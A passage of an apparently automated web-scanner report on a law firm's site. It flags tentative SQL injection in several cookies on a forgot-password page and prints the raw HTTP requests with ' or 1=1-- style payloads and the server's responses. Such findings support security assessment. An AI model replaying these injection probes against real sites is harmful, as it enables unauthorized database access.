Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.312242310'%20or%201%3d2--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.51. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 16096722'%20or%201%3d1--%20 and 16096722'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.2.10.130522975816096722'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Wed, 12-May-2010 19:51:38 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.2.10.130522975816096722'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.52. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 12161077%20or%201%3d1--%20 and 12161077%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704612161077%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 12-May-2010 17:53:21 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704612161077%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.53. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 24015633'%20or%201%3d1--%20 and 24015633'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman24015633'%20or%201%3d1--%20; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 12-May-2010 17:52:10 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman24015633'%20or%201%3d2--%20; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.54. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hsfirstvisit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 46466794'%20or%201%3d1--%20 and 46466794'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4646466794'%20or%201%3d1--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Wed, 12-May-2010 17:52:44 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4646466794'%20or%201%3d2--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.55. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotdt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 18225561'%20or%201%3d1--%20 and 18225561'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A2718225561'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Wed, 12-May-2010 17:52:15 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
